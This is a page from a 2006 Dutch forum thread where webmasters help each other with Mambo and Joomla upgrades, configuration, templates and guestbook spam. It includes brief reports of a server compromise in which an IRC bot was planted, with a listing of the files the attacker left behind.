Acties:
  • 0 Henk 'm!

• timovd

timovd

Voorsprong door techniek

low_n_slow schreef op maandag 16 januari 2006 @ 23:57:
[...]

en waar stel ik dat in? ik heb echt geen flauw idee :D
wat ik zo kan zien is dit het niet... maar nou ben ik dan ook geen expert op dit gebied...
iemand een ander ideetje?
In de root staat het bestand "configuration.php". "Live site" of iets in die richting staat op "localhost" of "127.0.0.1".

Edit: Dit kun je ook zien bij "Global Configuration" --> "Server" als je bent ingelogd.

[ Voor 15% gewijzigd door timovd op 17-01-2006 09:26 ]

Acties:
  • 0 Henk 'm!

• TD-er
  • Registratie: Januari 2000
  • Laatst online: 31-05 11:50
.Peter schreef op dinsdag 17 januari 2006 @ 08:35:
[...]

Met 1.05 heb ik nog exact hetzelfde probleem, alleen hier dan met een IRC bot die moet gaan draaien. In de tmp dir wordt een perl botje neergezet, en uitvoerd tot de gebruiker hem stopt. Hier heeft dat tot pieken tot wel 60MBit geleidt. Wat de jouwe doet kan ik niet zien, gezien dat IP niet werkt.
Als ik die URL zo bekijk, dan is het volgens mij helemaal niet zozeer een mambo-exploit, maar werkt 'ie doordat er dingen fout gaan in het maken van een PDF van een document. Zal waarschijnlijk wel een buffer-overflow probleem zijn oid. (geen idee wat er in het bestand cmd.gif staat)
Het is dus meer een exploit die toevallig gebruik maakt van Mambo/Joomla, maar als er in PHP-nuke ook zo'n PDF-maak optie zit, zou die er mogelijk dus ook vatbaar voor kunnen zijn.

Een goedkope voeding is als een lot in de loterij, je maakt kans op een paar tientjes korting, maar meestal betaal je de hoofdprijs. mijn posts (nodig wegens nieuwe layout)

Acties:
  • 0 Henk 'm!

Anoniem: 33616

LuNaTiC schreef op maandag 16 januari 2006 @ 13:35:
Als je upgrade naar 1.0.5 (of zelfs 1.0.4) moet dat voldoende zijn om in elk geval de grootste securityfouten eruit te slopen. Bij de update 1.0.5 en 1.0.7 (wat 1.0.6 is met een bugfix) gaat het slechts om minor security fixed, geen critical.

1.0.5 heb ik overigens prima draaien in combinatie net JACLplus.

Acties:
  • 0 Henk 'm!

• Nakebod

Nakebod

Nope.

Vind het wel erg jammer dat Joomla geen goed rechten systeem heeft.
Voor mijn werk ben ik bezig met een website, en ik gebruik zoveel liever Joomla dan PostNuke. PostNuke heeft wel een uitgebreid rechten systeem, alleen zit ik daar momenteel mee in de knoop. Dus ik ben ook nog niet zeker of dat gaat lukken.
En ik wil geen hacks gebruiken, het moet eenvoudig upgradebaar zijn in de toekomst, en dat is met een hack vaak minder, zie LuNaTiC maar :)
Voor een privé site zou ik er niet zo moeilijk over doen, maar nu is het wat lastiger.

Acties:
  • 0 Henk 'm!

• TD-er
.Peter schreef op dinsdag 17 januari 2006 @ 08:35:
[...]

Hmm ik heb nu min of meer hetzelfde gehad.

Stond dat botje in ./tmp/.tmp/public_html/s
?

In elk geval minstens 1.4 GB aan upload in een uur tijd, CPU-load van bijna 100% en die file "s" is dus een binary.

Dit zijn de files die achter gelaten zijn:
code:
1
2
3
4
5
6
7
8
9
10
11
12
total 243
-rwxr-xr-x  1 apache apache  17365 Jan 19 00:32 entity-gen
-rw-r--r--  1 apache apache    747 Mar  1  2001 entity-gen.c
-rw-r--r--  1 apache apache  22935 Oct 10  2000 mech.help
-rw-r--r--  1 apache apache   1056 Jan 19 01:00 mech.levels
-rw-------  1 apache apache      6 Jan 18 12:43 mech.pid
-rw-r--r--  1 apache apache    273 Jan 19 01:00 mech.session
-rw-r--r--  1 apache apache     32 Apr 16  2002 randlogins
-rwxr-xr-x  1 apache apache  21757 Jan 18 23:26 s
-rwx------  1 apache apache 153900 Jun 19  2005 sendmail:4HJO09GGC6.mail.com
-rw-r--r--  1 apache apache     77 Jan 19 01:00 usere
-rwxr-xr-x  1 apache apache  17783 Jan 19 00:32 v

Maar even naar thuis doorsturen en rustig analyseren.

Een goedkope voeding is als een lot in de loterij, je maakt kans op een paar tientjes korting, maar meestal betaal je de hoofdprijs. mijn posts (nodig wegens nieuwe layout)

Acties:
  • 0 Henk 'm!

Anoniem: 50159

Ik heb op dit moment Mambo versie 4.5.2 draaien. Althans, als ik als admin inlog zie ik dat rechtsboven. Hoe kan ik nu zien welke patch ik draai? Ik weet nl niet meer of ik de 4.5.2.3 patch geinstalleerd heb. Uiteindelijk wil ik naar versie 4.5.3 gaan, maar ik moet dus zeker weten dat ik de correcte patch installeer. Iemand een idee?

Acties:
  • 0 Henk 'm!

• Nakebod

Nakebod

Nope.

Als je 4.5.2.3 zou hebben zou ie dat als goed is aangeven.
Maar, wat ze adviseren is toch altijd een backup van de data en van de database te maken, en dan upgraden. Dus feitelijk kan er weinig mis gaan.
En als je twijfelt, patch eerst naar 4.5.2.3, en dan naar 4.5.3. (En daarna Joomla? :P)

Acties:
  • 0 Henk 'm!

Nakebod schreef op donderdag 19 januari 2006 @ 16:43:
Als je 4.5.2.3 zou hebben zou ie dat als goed is aangeven.
Maar, wat ze adviseren is toch altijd een backup van de data en van de database te maken, en dan upgraden. Dus feitelijk kan er weinig mis gaan.
En als je twijfelt, patch eerst naar 4.5.2.3, en dan naar 4.5.3. (En daarna Joomla? :P)
Maar kan ik zien dat ik op dit moment op versie 4.5.2.3 zit?

Tja... en daarna Joomla zeg je... lijkt me alleen niet simpel om te migreren naar Joomla.

[ Voor 10% gewijzigd door Anoniem: 50159 op 19-01-2006 20:19 ]

Acties:
  • 0 Henk 'm!

• TD-er
Anoniem: 50159 schreef op donderdag 19 januari 2006 @ 20:11:
[...]

Tja... en daarna Joomla zeg je... lijkt me alleen niet simpel om te migreren naar Joomla.
In de /includes/version.php staat het een beetje cryptisch omschreven.
Dit staat er in de 4.5.2.3 versie:
code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
/** Version information */
class version {
        /** @var string Product */
        var $PRODUCT = 'Mambo';
        /** @var int Main Release Level */
        var $RELEASE = '4.5';
        /** @var string Development Status */
        var $DEV_STATUS = 'Stable';
        /** @var int Sub Release Level */
        var $DEV_LEVEL = '2.3';
        /** @var string Codename */
        var $CODENAME = 'Titan Reassigned';
        /** @var string Date */
        var $RELDATE = '15-June-2005';

In de 4.5.2 versie staat dit:
code:
1
2
3
4
5
        var $DEV_LEVEL = '2';
        /** @var string Codename */
        var $CODENAME = 'Titan';
        /** @var string Date */
        var $RELDATE = '17-Feb-2005';

Acties:
  • 0 Henk 'm!

Lol. Oké. Bedankt. Ik zat dus nog op de 4.5.2. Ik heb geupdate naar versie 4.5.2.3 en daarna naar 4.5.3h zonder problemen. Bedankt voor je uitleg TD-er!

Acties:
  • 0 Henk 'm!

• TD-er
TD-er schreef op donderdag 19 januari 2006 @ 01:08:
[...]

Hmm ik heb nu min of meer hetzelfde gehad.

Stond dat botje in ./tmp/.tmp/public_html/s
?

In elk geval minstens 1.4 4 GB aan upload in een twee uur tijd, CPU-load van bijna 100% en die file "s" is dus een binary.
[....]
Maar even naar thuis doorsturen en rustig analyseren.
Thuis had ik de files nog in een tgz-file staan. De server had ik maar opnieuw geinstalleerd, omdat hij niet meer wilde booten enzo en ik het dus niet vertrouwde.
Nu gaf Kaspersky vanmorgen aan (na een scan van alle stations vannacht) dat er dus een virus in die files zit.
De b-versie van dit virus
Virus.Linux.RST.b dus. (staat van de b-versie nog geen omschrijving op de Kaspersky site)

Geen idee hoe het dus allemaal geinfecteerd kon worden, want de bestanden waren van eigenaar apache.

Acties:
  • 0 Henk 'm!

Anoniem: 50159 schreef op donderdag 19 januari 2006 @ 20:11:
[...]

Migratie naar Joomla is wel te doen hoor... staat allemaal wel uitgebreid omschreven op de site van joomla.

Ik zou het eerder nu doen dan straks, nu zijn de verschillen nog kleiner en is het overzetten gemakkelijker. Het lijkt me bijna wel zeker dat in Joomla de toekomst zit.

Acties:
  • 0 Henk 'm!

• TD-er
Ik ben erachter gekomen dat de migratie naar Joomla per site kan verschillen.
Zo heb ik als test bijvoorbeeld alles gekopieerd naar een subdir "joomla" (dus de site kwam dan op http://domein.nl/joomla/ ) en daaroverheen de Joomla files kopieren. (2 dingen in de configuration.php die in de joomla dir staat aanpassen dus)
De ene keer gaat dat goed en de andere keer klaagt 'ie vrijwel altijd over een template die 'ie niet kan vinden.

De enige oplossing leek dan te zijn om de oude site te backuppen en de joomla files te kopieren over de huidige site heen. (wel de installation dir weer weghalen)

Pas als dat helemaal goed lijkt te werken, de verwijzingen naar Mambo in de database aanpassen naar Joomla (installation/sql/migrate_Mambo4523_to_Joomla_100.sql).

Ik heb vrijwel alle sites in een keer kunnen upgraden van 4.5.2 of nieuwer naar Joomla 1.0.7

Acties:
  • 0 Henk 'm!

TD-er schreef op vrijdag 27 januari 2006 @ 18:04:
Ik ben erachter gekomen dat de migratie naar Joomla per site kan verschillen.
Zo heb ik als test bijvoorbeeld alles gekopieerd naar een subdir "joomla" (dus de site kwam dan op http://domein.nl/joomla/ ) en daaroverheen de Joomla files kopieren. (2 dingen in de configuration.php die in de joomla dir staat aanpassen dus)
De ene keer gaat dat goed en de andere keer klaagt 'ie vrijwel altijd over een template die 'ie niet kan vinden.

De enige oplossing leek dan te zijn om de oude site te backuppen en de joomla files te kopieren over de huidige site heen. (wel de installation dir weer weghalen)

Pas als dat helemaal goed lijkt te werken, de verwijzingen naar Mambo in de database aanpassen naar Joomla (installation/sql/migrate_Mambo4523_to_Joomla_100.sql).

Ik heb vrijwel alle sites in een keer kunnen upgraden van 4.5.2 of nieuwer naar Joomla 1.0.7
Volgens mij is upgraden van versie 4.5.3a wel weer wat lastiger... Maar ik weet het niet zeker :)

Acties:
  • 0 Henk 'm!

• Niek_
  • Registratie: Februari 2002
  • Laatst online: 02-06 11:46
Nou, hoe ik het voor elkaar heb gekregen weet ik niet maar goed:

ik mis m'n Log-in button aan de linkerkant.

Ik heb mijn joomla site zo standaard als het maar kon gelaten. Dus inclusief de login button/register aan de linkerkant. Nu heb ik een paar componenten toegevoegd (Zoom gallery en forum) en mis ik de login/register mogelijkheid.

Ik neem aan dat ik dit zelf ergens heb uitgezet. Maar na 2 uur zoeken in de back-end en het nog niet gevonden hebben.....roep ik jullie hulp in. Hoe kan ik dit weer terug laten komen?

Acties:
  • 0 Henk 'm!

Niek_ schreef op zaterdag 28 januari 2006 @ 17:22:
Nou, hoe ik het voor elkaar heb gekregen weet ik niet maar goed:

ik mis m'n Log-in button aan de linkerkant.

Ik heb mijn joomla site zo standaard als het maar kon gelaten. Dus inclusief de login button/register aan de linkerkant. Nu heb ik een paar componenten toegevoegd (Zoom gallery en forum) en mis ik de login/register mogelijkheid.

Ik neem aan dat ik dit zelf ergens heb uitgezet. Maar na 2 uur zoeken in de back-end en het nog niet gevonden hebben.....roep ik jullie hulp in. Hoe kan ik dit weer terug laten komen?
Kijk eens bij je modules en zoek daar de module login. Staat deze gepublished?

Acties:
  • 0 Henk 'm!

• -DarkShadow-
  • Registratie: December 2001
  • Niet online
Hoe heet deze Mambo template?
http://demo.mamboserver.com/

Bij mijn Mambo installatie is deze niet geinstalleerd en ik zou hem graag eens nader bekijken.

EDIT: Mijn hoster heeft hem niet geinstalleerd (Plesk), maar hij staat wel op mijn HDD. Het is gewoon Water & Stone.

[ Voor 28% gewijzigd door -DarkShadow- op 28-01-2006 23:05 ]

Specialist in:
Soldeerstations
Oscilloscoop

Acties:
  • 0 Henk 'm!

• Nakebod

Nakebod

Nope.

En behalve dat, zoiets is erg eenvoudig te checken :)
Check de page source, en zie: /templates/waterandstone/
Maar hij ziet er an sich wel netjes uit, simpel kleurgebruik, stijlvol. Volgens mij wel gebaseerd op de default template, maar dat maakt natuurlijk niet uit :)
En dat je hoster hem niet heeft, maakt niet uit toch? Gewoon template installen, en klaar.

Acties:
  • 0 Henk 'm!

• -DarkShadow-
  • Registratie: December 2001
  • Niet online
Nakebod schreef op zaterdag 28 januari 2006 @ 23:19:
En behalve dat, zoiets is erg eenvoudig te checken :)
Check de page source, en zie: /templates/waterandstone/
Maar hij ziet er an sich wel netjes uit, simpel kleurgebruik, stijlvol. Volgens mij wel gebaseerd op de default template, maar dat maakt natuurlijk niet uit :)
En dat je hoster hem niet heeft, maakt niet uit toch? Gewoon template installen, en klaar.
Water and stone is de default template bij versie 4.5.3h, mijn hoster installeerde versie 4.5.2 vanuit Plesk.

Specialist in:
Soldeerstations
Oscilloscoop

Acties:
  • 0 Henk 'm!

• Niek_
Anoniem: 33616 schreef op zaterdag 28 januari 2006 @ 17:53:
[...]

Kijk eens bij je modules en zoek daar de module login. Staat deze gepublished?
Bij module manager zie ik Login Form staan, deze is published.
afbeelding van module scherm

Snap er niks van... :?

Acties:
  • 0 Henk 'm!

Niek_ schreef op zondag 29 januari 2006 @ 17:23:
[...]

Bij module manager zie ik Login Form staan, deze is published.
afbeelding van module scherm

Snap er niks van... :?
En je hebt verder niks gedaan behalve die 2 genoemde componenten die je noemde geinstalleerd?

Acties:
  • 0 Henk 'm!

• Nakebod

Nakebod

Nope.

En een vrij simpele vraag, maar .. het kan zomaar :P
Login form, left, varies.
Dus hij staat niet op iedere pagina, maar slechts op de pagina's die geselecteerd zijn. Toevallig/per ongeluk iets veranderd? Zodat hij hem bijv nog maar op 1 pagina laat zien waar je toevallig net niet komt?
Zelf zet ik Login form eigenlijk altijd op All, vaak wel zo makkelijk.

Even een late edit:
Het is waarschijnlijk niet eens een Joomla gerelateerd probleem, gezien we het ook met een ander (Betaald) CMS systeem hebben, maar misschien herkent iemand het volgende.
Via het werk, internet via MS ISA server. 1 Linux webdoos, en 1 Windows webdoos.
Ik draai 4 sites met Joomla op de Linux server, 3 werken er probleemloos, 1 werkt gewoon weg niet. Dat wil zeggen, extern werken ze alle 4 prima.
Ook als we via de Windows webserver, zonder ISA proxy, naar de site gaan gaat dit prima.
De site die niet werkt, geeft een 407 error, of een timeout (10060). De content wordt soms wel geladen, maar templates/afbeeldingen worden niet geladen. Requests aan de site zijn ook niet in de logs van apache terug te vinden, dus de aanvraag komt niet eens bij of door de ISA server.

[ Voor 53% gewijzigd door Nakebod op 30-01-2006 15:49 ]

Acties:
  • 0 Henk 'm!

• ZaWoot
  • Registratie: April 2002
  • Laatst online: 31-05 10:47

ZaWoot

Red Is The Color

Nakebod schreef op maandag 30 januari 2006 @ 09:04:
De content wordt soms wel geladen, maar templates/afbeeldingen worden niet geladen.
Dit gedeelte kan er op duiden dat configuration.php niet goed staat ingesteld (absolute_path,live_site,cache)

Acties:
  • 0 Henk 'm!

• Nakebod

Nakebod

Nope.

Zonder het verder uit te zoeken, zit momenteel weer thuis, ontken ik voor 99.99% zeker dat het daaraan ligt.
Want dan zou hij vanaf thuis, en net nog gecheckt, ook dat moeten doen. En vanaf thuis/alle andere locaties werkt de site prima. Dus daar kan het probleem gewoonweg niet liggen. Tenzei we voor bepaalde IP ranges ook al een andere configs kunnen laden :P

Acties:
  • 0 Henk 'm!

Dus hij staat niet op iedere pagina, maar slechts op de pagina's die geselecteerd zijn. Toevallig/per ongeluk iets veranderd? Zodat hij hem bijv nog maar op 1 pagina laat zien waar je toevallig net niet komt?
Ja das ook een leuke... Loop je uren te zoeken is het zoiets lulligs ;)

Acties:
  • 0 Henk 'm!

• Palomar
  • Niet online
Ik ben nu een tijdje aan het experimenteren met Joomla en ik begin een beetje door te krijgen hoe alles werkt (ben een ander pakket gewend). Ik heb ook al uitgebreid de manual doorgenomen, maar ik snap alleen nog niet zo goed wat het verschil is tussen 'news' en 'blog'. Deze menu-items staan standaard zo ingesteld. Als ik content toevoeg komt het in een kolomvorm bij 'blog' te staan, maar wat is 'news' dan? Wat is het verschil?

[ Voor 21% gewijzigd door Palomar op 02-02-2006 21:00 ]

Acties:
  • 0 Henk 'm!

• LuNaTiC
  • Niet online

LuNaTiC

Olijke schavuit

Volgens mij is het (uit mn hoofd) bij een standaard installatie dat news in table vorm is, en blog in blog-vorm.

Dat zijn eigenlijk de twee manieren waarop je een category en/of section kan weergeven.

Als je uitgaat van een menu-item kun je dat dan op drie manieren benaderen (puur gezien vanuit content, even componenten/wrappers ed buiten beschouwing latend).

1. een Content-item. Menu-item linkt naar een content item, niet meer niet minder.
2. een Category/Section Table : de pagina geeft alle content items binnen een category of section neer, en als er dus meerdere zijn, dan is er een soort van table als index
3. een Category/Section Blog: zelfde verhaal als hierboven, alleen nu worden die items in een blogvorm weergegeven.

Kortom, bij een standaard joomla installatie valt 'news' onder 2, en 'blog' onder 3.

Weet niet of ik het zo een beetje duidelijk uitleg aan je, maar goed :)

Acties:
  • 0 Henk 'm!

• Palomar
  • Niet online
Thnx, het wordt me idd duidelijker :) Ik ben nog erg gewend aan een ander pakket (xoops) waarbij content duidelijk gekoppeld is aan een module en ook niet uitwisselbaar is tussen modules (en menu-items). Bij Joomla heb je voor zover ik nu zie globale sections waarmee je in alle vrijheid dingen kunt doen. Stukken beter dus, maar wel even wennen ;)

Acties:
  • 0 Henk 'm!

• Nakebod

Nakebod

Nope.

News en blog vind ik nog steeds een beetje lastig ja :)
Vooral omdat ze geloof ik standaard op 1 pagina staan.

Net zoiets als news en newsflash, ook een beetje onduidelijk in het begin. Newsflash is een korter bericht, maar toch is het news :P

Acties:
  • 0 Henk 'm!

• Palomar
  • Niet online
Ja, ik zit ook nog steeds te klooien met iets wat eigenlijk maar een klein detail is, maar wel irritant (en nog irritanter omdat ik niet kan vinden hoe het komt :P). Het gaat om dat 'blok' met 'Latest news'. Als je op een nieuwsitem klikt komt het artikel ook in beeld, maar in het mainmenu is 'blog' dan gehighlight. Ik wil dat 'news' dan gehighlight wordt. Maar ik kan dat nergens vinden :(

[ Voor 9% gewijzigd door Palomar op 02-02-2006 22:16 ]

Acties:
  • 0 Henk 'm!

• R2D2
  • Niet online
Palomar schreef op donderdag 02 februari 2006 @ 22:16:
Ja, ik zit ook nog steeds te klooien met iets wat eigenlijk maar een klein detail is, maar wel irritant (en nog irritanter omdat ik niet kan vinden hoe het komt :P). Het gaat om dat 'blok' met 'Latest news'. Als je op een nieuwsitem klikt komt het artikel ook in beeld, maar in het mainmenu is 'blog' dan gehighlight. Ik wil dat 'news' dan gehighlight wordt. Maar ik kan dat nergens vinden :(
Upgraden naar de laatste versie van Joomla en dan lekker dat blog gebeuren uit je menu mikken (of laten staan kan ook want het werkt dan verder prima).

Kijk maar op mijn site...... werkt daar prima. Ik had het probleem eerder ook en heb het destijds eens gesubmit als een bug (als je een oude versie draait loop je namelijk tegen meet problemen aan als alleen het gehighlite blok) en het is opgelost.

Acties:
  • 0 Henk 'm!

• Palomar
  • Niet online
Ik heb het eergisteren geinstalleerd, dus ik neem aan dat ik de laatste versie wel heb (Joomla! 1.0.7 Stable). Maar ik zal het nog even nachecken. Anders dan delete ik gewoon al de sample-data, want ik heb nu wel een beetje een idee hoe ik nieuwe content toe moet voegen. Misschien dat ik die highlight dan ook wel goed krijg. [edit] Het gaat nu idd wel goed nu ik dei voorgeprogrammeerde 'blog' eruit heb geknikkerd en een nieuwe 'Blog - content category' heb aangemaakt:)

Je site ziet er wel strak uit trouwens :) Je ziet bijna niet meer dat het een CMS is (veel CMS-sites zien er erg 'CMS' uit als je begrijpt wat ik bedoel ;))

[ Voor 40% gewijzigd door Palomar op 03-02-2006 13:26 ]

Acties:
  • 0 Henk 'm!

• Nakebod

Nakebod

Nope.

Ik ben voor weer een nieuwe site naar iets op zoek als docman, alleen dan eigenlijk iets dat letterlijk een map uitleest (+Submappen)

Per maand, ongeveer 1000/2000 PDF files, zowel in het NL als in het EN. Deze worden automatisch via raportages aangemaakt, en afhankelijk van het rapport in een bepaalde submap geplaatst.
Om een voorbeeldje te geven van de mapstructuur: NL/2005-2/Nederland/Fokbedrijven/Zeugenlijn/TAAAA/
En dan zo een 20/25 files per dir.

Momenteel gebruik ik Apache met een aangepaste dirlist, en dat beveiligd met een .htaccess/htpasswd.
Nu moest er voor de frontend een CMS komen, een bepaalde pagina moet veel/vaak aangepast worden. En nu wil ik proberen het Joomla login gedeelte te gebruiken voor dit achterliggende gedeelte, al dan niet via een componenent.
Dus ik zoek denk ik een soort filemanager. En als het kan, moeten er ook 4 users en/of groepen komen, 2 managers (NL en EN) en 2 normale gebruikers (NL en EN) en de NL groepen hebben uiteraard geen toegang tot de EN mappen.

Heb niet het idee dat Joomla Xplorer voor mijn doel geschikt is, dus hopelijk weet iemand anders iets.

Acties:
  • 0 Henk 'm!

• Niek_
Auw.....hij stond op varies. Maar goed, probleem opgelost. :)

Zie alleen nu dat ik in het bevestigingsmailtje (van de inschrijving) een directe link naar mijn site te zien krijg. Dit is alleen iets te direct aangezien hij in een submap van een andere site draait. Hoe zorg ik ervoor dat daar de 'gewone' url komt te staan en niet de directe?

[ Voor 44% gewijzigd door Niek_ op 04-02-2006 11:24 ]

Acties:
  • 0 Henk 'm!

• Sfinx-
  • Registratie: Mei 2004
  • Laatst online: 02-06 16:13
Hello iedereen,

Ik ben een tijdje geleden voor het eerst begonnen met een Joomla-site te bouwen, maar tijdens de examenperiode heb ik er niet meer aan verdergewerkt. Nu ik terug wil beginnnen vind ik op het eerste zicht niet meer terug waar ik vroeger m'n nederlandse componenten haalde.

Ik dacht dat ik deze op http://www.dutchjoomla.com/ vond maar als ik op de download link klik dan gaat hij naar http://forge.joomla.org waar ik deze toffe melding krijg:
You have been denied access to this page. Please log in to verify your access permissions.
Soit, ik ben dus op zoek naar nederlandstalige components/modules/..., ik vind vrij gemakkelijk nederlandstalige fora over joomla maar nergens deftige download-secties :?

Ik zie ook dat er een nieuwere versie is, 1.0.7. Momenteel draai ik 1.0.3... maar hoe moet je de upgrade juist uitvoeren? Gewoon uppen naar je ftp en de oude files overschrijven? Ik kan trouwens ook de nederlandstalige versie niet vinden, als ik de link volg krijg ik dezelfde access denied message :'(

[ Voor 19% gewijzigd door Sfinx- op 04-02-2006 13:52 ]

Acties:
  • 0 Henk 'm!

• raptorix
Ik ben gestopt met Joomla, het systeem is mij te buggy, bovendien ontbreekt het aan fatsoenlijke structuur. Ik zou iedereen adviseren eens te kijken naar www.umbraco.org . Een CMS dat tenminste wel op een degelijke manier in elkaar zit.

Acties:
  • 0 Henk 'm!

• TD-er
raptorix schreef op dinsdag 07 februari 2006 @ 13:13:
Ik ben gestopt met Joomla, het systeem is mij te buggy, bovendien ontbreekt het aan fatsoenlijke structuur. Ik zou iedereen adviseren eens te kijken naar www.umbraco.org . Een CMS dat tenminste wel op een degelijke manier in elkaar zit.
Hoe host je dat op een niet-Windows-server?

Acties:
  • 0 Henk 'm!

• Nakebod

Nakebod

Nope.

Niet.
Tenzei je Apache met ASP wil laten werken.
Maar echt warm loop ik niet van die demo. Ook geen modules enzo zoals bij Mambo/Joomla.
Maar goed, mijn ervaring is gelukkig dat Joomla niet buggy is, dus heb geen noodzaak om iets anders te zoeken. Ook is de structuur prima in mijn ogen. Weet niet wat je precies mist dan?

Acties:
  • 0 Henk 'm!

• raptorix
TD-er schreef op dinsdag 07 februari 2006 @ 13:40:
[...]

Hoe host je dat op een niet-Windows-server?
Binnenkort komt er mysql support en in combinatie met mono kan je het dan ook op bijvoorbeeld linux draaien.

Acties:
  • 0 Henk 'm!

• raptorix
Nakebod schreef op dinsdag 07 februari 2006 @ 14:17:
Niet.
Tenzei je Apache met ASP wil laten werken.
Maar echt warm loop ik niet van die demo. Ook geen modules enzo zoals bij Mambo/Joomla.
Maar goed, mijn ervaring is gelukkig dat Joomla niet buggy is, dus heb geen noodzaak om iets anders te zoeken. Ook is de structuur prima in mijn ogen. Weet niet wat je precies mist dan?
Hoezo geen modules, het mooie is dat je elk willekeurig .Net Component kan gebruiken.
Het voordeel van Umbraco is dat men zich puur richt op de core, en niet allerlei frutsels. Een ander voordeel is dat je vrijwel alles vanuit de management console kan beheren, wil je bijvoorbeeld een nieuw contenttype? Prima dan maak je dat aan, je klikt de velden bij elkaar, en je kan invoeren. Bij Joomla heb je voor dit soort acties veel meer tijd nodig.

Acties:
  • 0 Henk 'm!

• MauriX
  • Registratie: Januari 2002
  • Laatst online: 10-05-2022
Ik probeer ook te beginnen met Mambo(heb een site met mysql, en php ondersteuning) maar nu probeer ik via mamboserver.com mambo te downloaden, maar het geeft errors. Hij kan het bestand niet vinden. Doe ik iets verkeerd, of ligt het aan de site. Weet iemand in dat geval een mirror(van de laatste versie)

Alvaste bedankt.

Acties:
  • 0 Henk 'm!

• Palomar
  • Niet online
Joomla is de (officieuze) opvolger van Mambo, dus die kun je beter downloaden.

www.joomla.org

Acties:
  • 0 Henk 'm!

• Yoeri
  • Registratie: Maart 2003
  • Niet online

Yoeri

O+ Joyce O+

(overleden)
Domme vraag waarschijnlijk:

Ik heb een vrij uitgebreid menu, maar nu moeten een paar menu-items plots naar een ander content-item verwijzen. Ik kan die items natuurlijk opnieuw aanmaken, maar is het niet eenvoudig mogelijk om gewoon de target van een menu-item te wijzigen?

Kijkje in de redactiekeuken van Tweakers.net
22 dec: Onze reputatie hooghouden
20 dec: Acht fouten

Acties:
  • 0 Henk 'm!

Anoniem: 99283

hoe kan ik in een category een category maken.
Bijv.
• Nieuws
  • Informatie
  1. Verhuur
  2. Route
  • Foto´s
  1. gebouw
  2. omgeving
Het kan wel in het menu maar kan je ook zorgen dat het zo onder elkaar komt te staan bij de category manager.

[ Voor 25% gewijzigd door Anoniem: 99283 op 09-02-2006 13:36 ]

Acties:
  • 0 Henk 'm!

• Yoeri
  • Niet online

Yoeri

O+ Joyce O+

(overleden)
Met Joomla kun je maar twee niveau's diep gaan: Sections en Category's

Je moet de inwendige inhoudelijke opzet van je documenten los zien van de menustructuur, waarin je quasi onbeperkt kunt nesten :)

Kijkje in de redactiekeuken van Tweakers.net
22 dec: Onze reputatie hooghouden
20 dec: Acht fouten

Acties:
  • 0 Henk 'm!

• Falcon2107
  • Laatst online: 06-09-2022

Falcon2107

DUTCH-FALCON

Probleempje:

Ik gebruik voor een wesite Akobook 3.42. Maar in het gastenboek, krijg ik nu elke dag automatische gegenereerde spam. Allemaal berichtjes van een amerikaan die de webiste zoooooooooooo geweldig.

Is er een manier om dit tegen te gaan?

Acties:
  • 0 Henk 'm!

• mithras
  • Niet online
Falcon2107 schreef op donderdag 09 februari 2006 @ 18:04:
Probleempje:

Ik gebruik voor een wesite Akobook 3.42. Maar in het gastenboek, krijg ik nu elke dag automatische gegenereerde spam. Allemaal berichtjes van een amerikaan die de webiste zoooooooooooo geweldig.

IP loggen om vervolgens de spammer te blokkeren? Zou je zelf wel in de code moeten duiken denk ik

Acties:
  • 0 Henk 'm!

• Palomar
  • Niet online
Probleempje:

als ik het me goed herinner ben ik es een gemodificeerde versie tegengekomen, genaamd Akobookplus, welke bescherming tegen spammers heeft.

Acties:
  • 0 Henk 'm!

• P_de_B
  • Niet online
Probleempje:

Deze zeker:
Name: Stephen
Text: Great! Where you get this guestbook? I want the same script. Useful information. thnx.\r\nCheck my site: cheese ball recipe | apple | apple ipod | apple store | apple pie | apricot | apricots | fruits basket | fruit | fruit cake recipes | fruit of the loom
Erg vervelend inderdaad, ik heb er ook elke dag wel een stuk of 5.

Acties:
  • 0 Henk 'm!

• Falcon2107

Falcon2107

DUTCH-FALCON

P_de_B schreef op donderdag 09 februari 2006 @ 20:32:
[...]

Deze zeker:

[...]

Erg vervelend inderdaad, ik heb er ook elke dag wel een stuk of 5.
Zoiets idd. Ik wil van die vent af

Ik zal eens op zoek gaan

Acties:
  • 0 Henk 'm!

• Falcon2107

Falcon2107

DUTCH-FALCON

[quote]Falcon2107 schreef op donderdag 09 februari 2006 @ 20:35:
[...]

Zoiets idd. Ik wil van die vent af

Ik zal eens op zoek gaan[/quote]

Ik heb het volgende gevonden

DutchJoomlers forum

Hierbij heb ik de fix gebruikt, maar nu heb ik rare code in het visuele gedeelte van de pagina.
Hoe kan ik dit oplossen?

De website > gastenboek

Opgelost

Wel de juiste language file aanpassen

[ Voor 9% gewijzigd door Falcon2107 op 10-02-2006 16:11 ]

Acties:
  • 0 Henk 'm!

Anoniem: 50739

*knip

dat probleem is opgelost

nu zit ik met het volgende

ik wil de laatste nieuws items weergeven (5 stuks) met title, datum en kort stukje van de inhoud, hoe ik krijg ik dit voor elkaar?(niet via <?php mosMainBody(); ?>) het lukt me maar niet en er is hier ook geen standaart module die dit waarmaakt.

[ Voor 67% gewijzigd door Anoniem: 50739 op 20-02-2006 19:59 ]

Pagina: 1 ... 9 ... 11 Laatste

Dit topic is gesloten.